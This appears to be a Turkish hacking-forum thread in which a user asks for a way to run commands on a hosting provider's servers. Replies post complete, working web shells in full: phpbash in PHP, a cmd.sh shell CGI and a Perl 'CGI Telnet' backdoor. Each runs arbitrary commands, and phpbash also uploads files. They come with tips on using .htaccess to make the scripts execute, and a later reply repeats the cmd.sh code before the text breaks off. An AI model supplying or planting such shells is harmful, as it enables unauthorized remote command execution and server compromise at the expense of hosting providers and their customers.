⌘K
beyler az yardım edin yav
merhaba beyler yoncude komut calistirabilecegim bi tool var mıdır acep?
yoncu bypass shell vardı forumda galiba
Bunu dene 1
PHP:
<?php
/* phpbash by Alexander Reid (Arrexel) */
if (ISSET($_POST['cmd'])) {
$output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
foreach ($output as $line) {
echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
}
die();
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
$filename = $_FILES["file"]["name"];
$path = $_POST['path'];
if ($path != "/") {
$path .= "/";
}
if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
} else {
echo "Error uploading " . htmlentities($filename);
}
die();
}
?>
<html>
<head>
<title></title>
<style>
html, body {
max-width: 100%;
}
body {
width: 100%;
height: 100%;
margin: 0;
background: #000;
}
body, .inputtext {
font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
font-size: 14px;
font-style: normal;
font-variant: normal;
font-weight: 400;
line-height: 20px;
overflow: hidden;
}
.console {
width: 100%;
height: 100%;
margin: auto;
position: absolute;
color: #fff;
}
.output {
width: auto;
height: auto;
position: absolute;
overflow-y: scroll;
top: 0;
bottom: 30px;
left: 5px;
right: 0;
line-height: 20px;
}
.input form {
position: relative;
margin-bottom: 0px;
}
.username {
height: 30px;
width: auto;
padding-left: 5px;
line-height: 30px;
float: left;
}
.input {
border-top: 1px solid #333333;
width: 100%;
height: 30px;
position: absolute;
bottom: 0;
}
.inputtext {
width: auto;
height: 30px;
bottom: 0px;
margin-bottom: 0px;
background: #000;
border: 0;
float: left;
padding-left: 8px;
color: #fff;
}
.inputtext:focus {
outline: none;
}
::-webkit-scrollbar {
width: 12px;
}
::-webkit-scrollbar-track {
background: #101010;
}
::-webkit-scrollbar-thumb {
background: #303030;
}
</style>
</head>
<body>
<div class="console">
<div class="output" id="output"></div>
<div class="input" id="input">
<form id="form" method="GET" onSubmit="sendCommand()">
<div class="username" id="username"></div>
<input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus>
</form>
</div>
</div>
<form id="upload" method="POST" style="display: none;">
<input type="file" name="file" id="filebrowser" onchange='uploadFile()' />
</form>
<script type="text/javascript">
var username = "";
var hostname = "";
var currentDir = "";
var previousDir = "";
var defaultDir = "";
var commandHistory = [];
var currentCommand = 0;
var inputTextElement = document.getElementById('inputtext');
var inputElement = document.getElementById("input");
var outputElement = document.getElementById("output");
var usernameElement = document.getElementById("username");
var uploadFormElement = document.getElementById("upload");
var fileBrowserElement = document.getElementById("filebrowser");
getShellInfo();
function getShellInfo() {
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
var parsedResponse = request.responseText.split("<br>");
username = parsedResponse[0];
hostname = parsedResponse[1];
currentDir = parsedResponse[2].replace(new RegExp("/", "g"), "/");
defaultDir = currentDir;
usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
updateInputWidth();
}
};
request.open("POST", "", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.send("cmd=whoami; hostname; pwd");
}
function sendCommand() {
var request = new XMLHttpRequest();
var command = inputTextElement.value;
var originalCommand = command;
var originalDir = currentDir;
var cd = false;
commandHistory.push(originalCommand);
switchCommand(commandHistory.length);
inputTextElement.value = "";
var parsedCommand = command.split(" ");
if (parsedCommand[0] == "cd") {
cd = true;
if (parsedCommand.length == 1) {
command = "cd "+defaultDir+"; pwd";
} else if (parsedCommand[1] == "-") {
command = "cd "+previousDir+"; pwd";
} else {
command = "cd "+currentDir+"; "+command+"; pwd";
}
} else if (parsedCommand[0] == "clear") {
outputElement.innerHTML = "";
return false;
} else if (parsedCommand[0] == "upload") {
fileBrowserElement.click();
return false;
} else {
command = "cd "+currentDir+"; " + command;
}
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
if (cd) {
var parsedResponse = request.responseText.split("<br>");
previousDir = currentDir;
currentDir = parsedResponse[0].replace(new RegExp("/", "g"), "/");
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+originalDir+"# "+originalCommand+"</div><br>";
usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
} else {
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# "+originalCommand+"</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
outputElement.scrollTop = outputElement.scrollHeight;
}
updateInputWidth();
}
};
request.open("POST", "", true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.send("cmd="+encodeURIComponent(command));
return false;
}
function uploadFile() {
var formData = new FormData();
formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
formData.append('path', currentDir);
var request = new XMLHttpRequest();
request.onreadystatechange = function() {
if (request.readyState == XMLHttpRequest.DONE) {
outputElement.innerHTML += request.responseText+"<br>";
}
};
request.open("POST", "", true);
request.send(formData);
outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# Uploading "+fileBrowserElement.files[0].name+"...</div><br>";
}
function updateInputWidth() {
inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
}
document.onkeydown = checkForArrowKeys;
function checkForArrowKeys(e) {
e = e || window.event;
if (e.keyCode == '38') {
previousCommand();
} else if (e.keyCode == '40') {
nextCommand();
}
}
function previousCommand() {
if (currentCommand != 0) {
switchCommand(currentCommand-1);
}
}
function nextCommand() {
if (currentCommand != commandHistory.length) {
switchCommand(currentCommand+1);
}
}
function switchCommand(newCommand) {
currentCommand = newCommand;
if (currentCommand == commandHistory.length) {
inputTextElement.value = "";
} else {
inputTextElement.value = commandHistory[currentCommand];
setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0);
}
}
document.getElementById("form").addEventListener("submit", function(event){
event.preventDefault()
});
</script>
</body>
</html>cmd.sh olarak yükle htaccess ile .sh çalıştırmasını sağla tabiki 
PHP:
#!/bin/sh
#
# SH_KIT
#
# cmd.sh = Command Execution
#
# by: Ludoz
# modified: 23/04/2004
#
# Version 1.2 - 28/5/2003
#
###
###
### Configuracion
###
###
#
# sitios donde buscar ejecutables necesarios, sin la / posterior, separados por espacios
#
PATHS="/bin /usr/bin /sbin /usr/sbin /usr/local/bin /usr/local/sbin /usr/ucb /usr/libexec /tmp /usr/tmp /var/tmp ."
###
###
### La configuracion acaba aqui
###
###
#
# PATHs mas habituales de los 3 comandos base
#
TEST="/usr/bin/test"
BASENAME="/bin/basename"
DIRNAME="/usr/bin/dirname"
# compruebo TEST, BASENAME y DIRNAME y si estan mal intento encontrarlas en el path y sino en PATHS
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
for i in $PATHS ; do
TEST="$i/test"
if (eval $TEST \"1\" = \"1\" ); then
break
fi
done
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
TEST=test
if (eval $TEST \"1\" = \"1\" ); then
TEST=$TEST
else
TEST=""
echo ERROR: No he encontrado TEST en el sitio especificado ni en el path
echo
exit
fi
fi
fi
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
for i in $PATHS ; do
BASENAME="$i/basename"
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
break
fi
done
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
BASENAME=basename
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
BASENAME=""
echo ERROR: No he encontrado BASENAME en el sitio especificado ni en el path
echo
exit
fi
fi
fi
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
for i in $PATHS ; do
DIRNAME="$i/dirname"
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
break
fi
done
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
DIRNAME=dirname
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
DIRNAME=""
echo ERROR: No he encontrado DIRNAME en el sitio especificado ni en el path
echo
exit
fi
fi
fi
#echo "Info: TEST: $TEST"
#echo "Info: BASENAME: $BASENAME"
#echo "Info: DIRNAME: $DIRNAME"
if (eval $TEST -x \"/usr/bin/unalias\" ); then
# si existe el comando: unalias *
/usr/bin/unalias *
else
# si es interno: unalias -a
unalias -a
fi
#
# A partir de aqui deberia ser 100% multisistema
#
buscaexec ()
{
BUSCAEXECRES=""
if (eval $TEST -z \"$BUSCAEXECPAR\" ); then
return;
fi
if (eval $TEST -x \"$BUSCAEXECPAR\" ); then
BUSCAEXECRES=$BUSCAEXECPAR
return;
fi
BUSCAEXECPAR=`eval $BASENAME $BUSCAEXECPAR`
for i in $PATHS $PATH ; do
if (eval $TEST -x \"$i/$BUSCAEXECPAR\" ); then
BUSCAEXECRES="$i/$BUSCAEXECPAR"
break
fi
done
if (eval $TEST -n \"$BUSCAEXECRES\" ); then
return;
fi
if (eval $TEST -z \"$WHICH\" ); then
return;
fi
BUSCAEXECRES=`eval $WHICH $BUSCAEXECPAR`
if (eval $TEST -n \"$BUSCAEXECRES\" ); then
if (eval $TEST ! -x \"$BUSCAEXECRES\" ); then
BUSCAEXECRES=""
fi
fi
}
#
# Definicion de comandos concretos para el script
#
WHICH=""
BUSCAEXECPAR=/usr/bin/which
buscaexec
WHICH=$BUSCAEXECRES
if (eval $TEST -z \"$WHICH\" ) ; then
if (eval $TEST \"$TEST\" != \"test\" ) ; then
TESTCMD=$TEST
TESTRES="test"
elif (eval $TEST \"$BASENAME\" != \"basename\" ) ; then
TESTCMD=$BASENAME
TESTRES="basename"
elif (eval $TEST \"$BASEDIR\" != \"basedir\" ) ; then
TESTCMD=$BASEDIR
TESTRES="basename"
fi
if (eval $TEST -n \"$TESTCMD\"); then
OLDPATH=$PATH
TESTPATH="`eval $BASEDIR $TESTCMD`"
PATH="$TESTPATH:$PATH"
TESTPATH=""
PRUEBA="`eval $BASENAME \"\`which $TESTRES\`\" `"
if (eval $TEST \"$PRUEBA\" = \"TESTRES\" ) ; then
WHICH="`which which`"
else
WHICH=""
fi
PRUEBA=""
PATH=$OLDPATH
OLDPATH=""
TESTRES=""
TESTCMD=""
fi
fi
BUSCAEXECPAR=/bin/echo
buscaexec
ECHO=$BUSCAEXECRES
if (eval $TEST -z \"$ECHO\" ) ; then
ECHO=echo
fi
A="`eval $ECHO \"a\"`"
if (eval $TEST \"$A\" = \"a\" ) ; then
ECHO=$ECHO
else
ECHO=""
#nota mental: para que hago echo si echo no funciona!? :)
echo ERROR: No he encontrado ECHO en el sitio especificado ni en el path
echo
exit
fi
A=""
BUSCAEXECPAR=/bin/cut
buscaexec
CUT=$BUSCAEXECRES
BUSCAEXECPAR=/bin/sed
buscaexec
SED=$BUSCAEXECRES
BUSCAEXECPAR=/usr/bin/expr
buscaexec
EXPR=$BUSCAEXECRES
FORMULARIO="`eval $BASENAME $0`"
eval $ECHO \"Content-type: text/html\"
eval $ECHO
eval $ECHO \"\<html\>\<title\>CMD.SH\<\/title\>\<body\>\"
eval $ECHO \"\<p\>\<form method\=\\\"GET\\\" name\=\\\"myform\\\" action\=\\\"$FORMULARIO\\\"\>\<\/p\>\"
eval $ECHO \"\<input type\=\\\"text\\\" name\=\\\"cmd\\\"\>\"
eval $ECHO \"\<input type\=\\\"submit\\\" value\=\\\"Enviar\\\"\>\"
eval $ECHO \"\<pre\>\"
#
# La variable QUERYSTRING contiene la info que quiero
#
#echo QUERY_STRING=$QUERY_STRING
if (eval $TEST -n \"$QUERY_STRING\"); then
PARAM=`eval $ECHO \"$QUERY_STRING\" | $CUT \-d\= \-f2 | $SED \-e s\/\+\/\ \/g `
hex2dec()
{
if (eval $TEST \"$PARC\" \= \"0\" ); then
PARC="0"
elif (eval $TEST \"$PARC\" \= \"1\" ); then
PARC="1"
elif (eval $TEST \"$PARC\" \= \"2\" ); then
PARC="2"
elif (eval $TEST \"$PARC\" \= \"3\" ); then
PARC="3"
elif (eval $TEST \"$PARC\" \= \"4\" ); then
PARC="4"
elif (eval $TEST \"$PARC\" \= \"5\" ); then
PARC="5"
elif (eval $TEST \"$PARC\" \= \"6\" ); then
PARC="6"
elif (eval $TEST \"$PARC\" \= \"7\" ); then
PARC="7"
elif (eval $TEST \"$PARC\" \= \"8\" ); then
PARC="8"
elif (eval $TEST \"$PARC\" \= \"9\" ); then
PARC="9"
elif (eval $TEST \"$PARC\" \= \"a\" ); then
PARC="10"
elif (eval $TEST \"$PARC\" \= \"b\" ); then
PARC="11"
elif (eval $TEST \"$PARC\" \= \"c\" ); then
PARC="12"
elif (eval $TEST \"$PARC\" \= \"d\" ); then
PARC="13"
elif (eval $TEST \"$PARC\" \= \"e\" ); then
PARC="14"
elif (eval $TEST \"$PARC\" \= \"f\" ); then
PARC="15"
elif (eval $TEST \"$PARC\" \= \"A\" ); then
PARC="10"
elif (eval $TEST \"$PARC\" \= \"B\" ); then
PARC="11"
elif (eval $TEST \"$PARC\" \= \"C\" ); then
PARC="12"
elif (eval $TEST \"$PARC\" \= \"D\" ); then
PARC="13"
elif (eval $TEST \"$PARC\" \= \"E\" ); then
PARC="14"
elif (eval $TEST \"$PARC\" \= \"F\" ); then
PARC="15"
else
PARC="0"
fi
}
dec2ascii()
{
if (eval $TEST \"$PARC\" -eq \"0\"); then
PARC=""
elif (eval $TEST \"$PARC\" -lt \"32\"); then
PARC=""
elif (eval $TEST \"$PARC\" -eq \"34\"); then
PARC="\\\""
elif (eval $TEST \"$PARC\" -eq \"96\"); then
PARC="\`"
elif (eval $TEST \"$PARC\" -eq \"127\"); then
PARC=""
elif (eval $TEST \"$PARC\" -gt \"127\"); then
PARC=""
else
#aun no rulan todos los caracteres, los que faltan estan impresos en la linea inferior
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX " ` ?<- el resto se ignoran, son >128
PARC="`eval $ECHO \"123456789ABCDEF0123456789ABCDEF \!X#\$%\&\'\(\)\*+,\-.\/0123456789\:\;\<=\>\?\@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\\\\\]\^_Xabcdefghijklmnopqrstuvwxyz\{\\\|\}\~X0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\" | $CUT \-b$PARC `"
# X: no printable, en la linea superior esta el caracter
# los 0123456789ABCDEF es para no descontarme poniendo X cuando habia muchas seguidas
# notese que el NULL no sale en el string
# notese que la " y la ` estan como X en el string pq estan tratadas a parte, no se pueden tratar por el eval este
# notese que los caracteres por debajo del 32 tampoco se tratan, y los mayores de 127 tampoco, aunque se pueden añadir... si tienes ganas ;) y los necesitas realmente
fi
}
TODO="$PARAM"
DONE=""
while (eval $TEST -n \"$TODO\" ); do
C=`eval $ECHO \"$TODO\" | $CUT \-b1 `
if (eval $TEST \"$C\" = \"\%\"); then
PARC="`eval $ECHO \"$TODO\" | $CUT \-b2 `"
hex2dec
C1="$PARC"
PARC="`eval $ECHO \"$TODO\" | $CUT \-b3 `"
hex2dec
C2="$PARC"
PARC="`eval $EXPR $C1 \\\* 16 \+ $C2`"
dec2ascii
C="$PARC"
TODO=`eval $ECHO \"$TODO\" | $CUT \-b4\- `
else
TODO=`eval $ECHO \"$TODO\" | $CUT \-b2\- `
fi
DONE="$DONE$C"
done
VALUE="$DONE"
eval $ECHO \"\\\$ $VALUE\"
eval $VALUE
fi
eval $ECHO \"\<\/pre\>\<\/body\>\<\/html\>\"
exitcmd.cin yine htaccess ile çalıştır, perl cmd
PHP:
#!/usr/bin/perl -I/usr/local/bandmain
$WinNT = 0;
$NTCmdSep = "&";
$UnixCmdSep = ";";
$CommandTimeoutDuration = 10;
$ShowDynamicOutput = 1;
$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
sub ReadParse
{
local (*in) = @_ if @_;
local ($i, $loc, $key, $val);
$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
if($ENV{'REQUEST_METHOD'} eq "GET")
{
$in = $ENV{'QUERY_STRING'};
}
elsif($ENV{'REQUEST_METHOD'} eq "POST")
{
binmode(STDIN) if $MultipartFormData & $WinNT;
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
}
# handle file upload data
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
{
$Boundary = '--'.$1; # please refer to RFC1867
@list = split(/$Boundary/, $in);
$HeaderBody = $list[1];
$HeaderBody =~ /\r\n\r\n|\n\n/;
$Header = $`;
$Body = $';
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
$in{'filedata'} = $Body;
$Header =~ /filename=\"(.+)\"/;
$in{'f'} = $1;
$in{'f'} =~ s/\"//g;
$in{'f'} =~ s/\s//g;
# parse trailer
for($i=2; $list[$i]; $i++)
{
$list[$i] =~ s/^.+name=$//;
$list[$i] =~ /\"(\w+)\"/;
$key = $1;
$val = $';
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} = $val;
}
}
else # standard post data (url encoded, not multipart)
{
@in = split(/&/, $in);
foreach $i (0 .. $#in)
{
$in[$i] =~ s/\+/ /g;
($key, $val) = split(/=/, $in[$i], 2);
$key =~ s/%(..)/pack("c", hex($1))/ge;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} .= "\0" if (defined($in{$key}));
$in{$key} .= $val;
}
}
}
sub PrintPageHeader
{
$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
print "Content-type: text/html\n\n";
print <<END;
<style type="text/css">
.kodline{border:0px;background:transparent;color:#0F0;height:30px;width:100%;font-family:Arial;font-size:18px}
.kodline:hover{background:#666}
.kodline:focus{background:#222}
::-moz-selection { background: #F00; color: #FFF;}
::selection { background: #F00; color: #FFF;}
a::-moz-selection { background: #F00; color: #FFF;}
a::selection { background: #F00; color: #FFF;}
</style>
<body>
<div style="position:absolute;left:0px;top:0px;right:0px;height:26px;font: bold 20px 'Calibri', Arial ;background-color:#444;text-align:center;color:#FFF">CGI Telnet</div>
<div style="position:absolute;left:0px;top:26px;right:0px;bottom:30px;background-color:#111;padding:10px;color:#FFF;overflow:scroll;overflow-x:hidden;">
<font color="#777">/:\skycOde CGI-TELNET/:\<br></font>
END
}
sub PrintCommandLineInputForm
{
print <<END;
</div>
<div style="position:absolute;left:0px;right:0px;bottom:0px;;height:30px;background-color:#444">
<script>
function cgipresskey(e){
if(typeof event!='undefined'){pressedkey=window.event.keyCode}else{pressedkey=e.keyCode}
if(pressedkey==13){document.getElementById('gonder').click();}
}
</script>
<form method="POST" action="$ScriptLocation">
<input type="text" class="kodline" name="c" onkeyup="cgipresskey(event)">
<input type="hidden" name="d" value="$CurrentDir">
<input type="submit" id="gonder" style="visibility:hidden" value="Enter">
</form>
</div>
END
}
sub ExecuteCommand
{
if($RunCommand =~ m/^\s*cd\s+(.+)/)
{
$OldDir = $CurrentDir;
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
chop($CurrentDir = `$Command`);
&PrintPageHeader("c");
print "<font color=#EF2929>$OldDir # </font><font color=#4594D4>$RunCommand </font><br>";
print "<font color=#FF0>New Path : </font><font color=#FFF>$CurrentDir</font><br>";
}
else # some other command, display the output
{
&PrintPageHeader("c");
print "<font color=#EF2929>$CurrentDir # </font><font color=#4594D4>$RunCommand </font><font style=\"font-family:'Lucida Console';font-size:12px\"><xmp>";
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
if(!$WinNT)
{
$SIG{'ALRM'} = \&CommandTimeout;
alarm($CommandTimeoutDuration);
}
if($ShowDynamicOutput) # show output as it is generated
{
$|=1;
$Command .= " |";
open(CommandOutput, $Command);
while(<CommandOutput>)
{
$_ =~ s/(\n|\r\n)$//;
print "$_\n";
}
$|=0;
}
else # show output after command completes
{
print `$Command`;
}
if(!$WinNT)
{
alarm(0);
}
print "</xmp></font>";
}
&PrintCommandLineInputForm;
}
&ReadParse;
$ScriptLocation = $ENV{'SCRIPT_NAME'};
$ServerName = $ENV{'SERVER_NAME'};
$RunCommand = $in{'c'};
$CurrentDir = $in{'d'};
chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
&ExecuteCommand;-
sky
BABA
Bunu anlamadim basgan az acsanacmd.sh olarak yükle htaccess ile .sh çalıştırmasını sağla tabiki
PHP:#!/bin/sh # # SH_KIT # # cmd.sh = Command Execution # # by: Ludoz # modified: 23/04/2004 # # Version 1.2 - 28/5/2003 # ### ### ### Configuracion ### ### # # sitios donde buscar ejecutables necesarios, sin la / posterior, separados por espacios # PATHS="/bin /usr/bin /sbin /usr/sbin /usr/local/bin /usr/local/sbin /usr/ucb /usr/libexec /tmp /usr/tmp /var/tmp ." ### ### ### La configuracion acaba aqui ### ### # # PATHs mas habituales de los 3 comandos base # TEST="/usr/bin/test" BASENAME="/bin/basename" DIRNAME="/usr/bin/dirname" # compruebo TEST, BASENAME y DIRNAME y si estan mal intento encontrarlas en el path y sino en PATHS if (eval $TEST \"1\" = \"1\" ); then TEST=$TEST else for i in $PATHS ; do TEST="$i/test" if (eval $TEST \"1\" = \"1\" ); then break fi done if (eval $TEST \"1\" = \"1\" ); then TEST=$TEST else TEST=test if (eval $TEST \"1\" = \"1\" ); then TEST=$TEST else TEST="" echo ERROR: No he encontrado TEST en el sitio especificado ni en el path echo exit fi fi fi if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then BASENAME=$BASENAME else for i in $PATHS ; do BASENAME="$i/basename" if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then break fi done if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then BASENAME=$BASENAME else BASENAME=basename if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then BASENAME=$BASENAME else BASENAME="" echo ERROR: No he encontrado BASENAME en el sitio especificado ni en el path echo exit fi fi fi if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then DIRNAME=$DIRNAME else for i in $PATHS ; do DIRNAME="$i/dirname" if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then break fi done if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then DIRNAME=$DIRNAME else DIRNAME=dirname if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then DIRNAME=$DIRNAME else DIRNAME="" echo ERROR: No he encontrado DIRNAME en el sitio especificado ni en el path echo exit fi fi fi #echo "Info: TEST: $TEST" #echo "Info: BASENAME: $BASENAME" #echo "Info: DIRNAME: $DIRNAME" if (eval $TEST -x \"/usr/bin/unalias\" ); then # si existe el comando: unalias * /usr/bin/unalias * else # si es interno: unalias -a unalias -a fi # # A partir de aqui deberia ser 100% multisistema # buscaexec () { BUSCAEXECRES="" if (eval $TEST -z \"$BUSCAEXECPAR\" ); then return; fi if (eval $TEST -x \"$BUSCAEXECPAR\" ); then BUSCAEXECRES=$BUSCAEXECPAR return; fi BUSCAEXECPAR=`eval $BASENAME $BUSCAEXECPAR` for i in $PATHS $PATH ; do if (eval $TEST -x \"$i/$BUSCAEXECPAR\" ); then BUSCAEXECRES="$i/$BUSCAEXECPAR" break fi done if (eval $TEST -n \"$BUSCAEXECRES\" ); then return; fi if (eval $TEST -z \"$WHICH\" ); then return; fi BUSCAEXECRES=`eval $WHICH $BUSCAEXECPAR` if (eval $TEST -n \"$BUSCAEXECRES\" ); then if (eval $TEST ! -x \"$BUSCAEXECRES\" ); then BUSCAEXECRES="" fi fi } # # Definicion de comandos concretos para el script # WHICH="" BUSCAEXECPAR=/usr/bin/which buscaexec WHICH=$BUSCAEXECRES if (eval $TEST -z \"$WHICH\" ) ; then if (eval $TEST \"$TEST\" != \"test\" ) ; then TESTCMD=$TEST TESTRES="test" elif (eval $TEST \"$BASENAME\" != \"basename\" ) ; then TESTCMD=$BASENAME TESTRES="basename" elif (eval $TEST \"$BASEDIR\" != \"basedir\" ) ; then TESTCMD=$BASEDIR TESTRES="basename" fi if (eval $TEST -n \"$TESTCMD\"); then OLDPATH=$PATH TESTPATH="`eval $BASEDIR $TESTCMD`" PATH="$TESTPATH:$PATH" TESTPATH="" PRUEBA="`eval $BASENAME \"\`which $TESTRES\`\" `" if (eval $TEST \"$PRUEBA\" = \"TESTRES\" ) ; then WHICH="`which which`" else WHICH="" fi PRUEBA="" PATH=$OLDPATH OLDPATH="" TESTRES="" TESTCMD="" fi fi BUSCAEXECPAR=/bin/echo buscaexec ECHO=$BUSCAEXECRES if (eval $TEST -z \"$ECHO\" ) ; then ECHO=echo fi A="`eval $ECHO \"a\"`" if (eval $TEST \"$A\" = \"a\" ) ; then ECHO=$ECHO else ECHO="" #nota mental: para que hago echo si echo no funciona!? :) echo ERROR: No he encontrado ECHO en el sitio especificado ni en el path echo exit fi A="" BUSCAEXECPAR=/bin/cut buscaexec CUT=$BUSCAEXECRES BUSCAEXECPAR=/bin/sed buscaexec SED=$BUSCAEXECRES BUSCAEXECPAR=/usr/bin/expr buscaexec EXPR=$BUSCAEXECRES FORMULARIO="`eval $BASENAME $0`" eval $ECHO \"Content-type: text/html\" eval $ECHO eval $ECHO \"\<html\>\<title\>CMD.SH\<\/title\>\<body\>\" eval $ECHO \"\<p\>\<form method\=\\\"GET\\\" name\=\\\"myform\\\" action\=\\\"$FORMULARIO\\\"\>\<\/p\>\" eval $ECHO \"\<input type\=\\\"text\\\" name\=\\\"cmd\\\"\>\" eval $ECHO \"\<input type\=\\\"submit\\\" value\=\\\"Enviar\\\"\>\" eval $ECHO \"\<pre\>\" # # La variable QUERYSTRING contiene la info que quiero # #echo QUERY_STRING=$QUERY_STRING if (eval $TEST -n \"$QUERY_STRING\"); then PARAM=`eval $ECHO \"$QUERY_STRING\" | $CUT \-d\= \-f2 | $SED \-e s\/\+\/\ \/g ` hex2dec() { if (eval $TEST \"$PARC\" \= \"0\" ); then PARC="0" elif (eval $TEST \"$PARC\" \= \"1\" ); then PARC="1" elif (eval $TEST \"$PARC\" \= \"2\" ); then PARC="2" elif (eval $TEST \"$PARC\" \= \"3\" ); then PARC="3" elif (eval $TEST \"$PARC\" \= \"4\" ); then PARC="4" elif (eval $TEST \"$PARC\" \= \"5\" ); then PARC="5" elif (eval $TEST \"$PARC\" \= \"6\" ); then PARC="6" elif (eval $TEST \"$PARC\" \= \"7\" ); then PARC="7" elif (eval $TEST \"$PARC\" \= \"8\" ); then PARC="8" elif (eval $TEST \"$PARC\" \= \"9\" ); then PARC="9" elif (eval $TEST \"$PARC\" \= \"a\" ); then PARC="10" elif (eval $TEST \"$PARC\" \= \"b\" ); then PARC="11" elif (eval $TEST \"$PARC\" \= \"c\" ); then PARC="12" elif (eval $TEST \"$PARC\" \= \"d\" ); then PARC="13" elif (eval $TEST \"$PARC\" \= \"e\" ); then PARC="14" elif (eval $TEST \"$PARC\" \= \"f\" ); then PARC="15" elif (eval $TEST \"$PARC\" \= \"A\" ); then PARC="10" elif (eval $TEST \"$PARC\" \= \"B\" ); then PARC="11" elif (eval $TEST \"$PARC\" \= \"C\" ); then PARC="12" elif (eval $TEST \"$PARC\" \= \"D\" ); then PARC="13" elif (eval $TEST \"$PARC\" \= \"E\" ); then PARC="14" elif (eval $TEST \"$PARC\" \= \"F\" ); then PARC="15" else PARC="0" fi } dec2ascii() { if (eval $TEST \"$PARC\" -eq \"0\"); then PARC="" elif (eval $TEST \"$PARC\" -lt \"32\"); then PARC="" elif (eval $TEST \"$PARC\" -eq \"34\"); then PARC="\\\"" elif (eval $TEST \"$PARC\" -eq \"96\"); then PARC="\`" elif (eval $TEST \"$PARC\" -eq \"127\"); then PARC="" elif (eval $TEST \"$PARC\" -gt \"127\"); then PARC="" else #aun no rulan todos los caracteres, los que faltan estan impresos en la linea inferior # XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX " ` ?<- el resto se ignoran, son >128 PARC="`eval $ECHO \"123456789ABCDEF0123456789ABCDEF \!X#\$%\&\'\(\)\*+,\-.\/0123456789\:\;\<=\>\?\@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\\\\\]\^_Xabcdefghijklmnopqrstuvwxyz\{\\\|\}\~X0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\" | $CUT \-b$PARC `" # X: no printable, en la linea superior esta el caracter # los 0123456789ABCDEF es para no descontarme poniendo X cuando habia muchas seguidas # notese que el NULL no sale en el string # notese que la " y la ` estan como X en el string pq estan tratadas a parte, no se pueden tratar por el eval este # notese que los caracteres por debajo del 32 tampoco se tratan, y los mayores de 127 tampoco, aunque se pueden añadir... si tienes ganas ;) y los necesitas realmente fi } TODO="$PARAM" DONE="" while (eval $TEST -n \"$TODO\" ); do C=`eval $ECHO \"$TODO\" | $CUT \-b1 ` if (eval $TEST \"$C\" = \"\%\"); then PARC="`eval 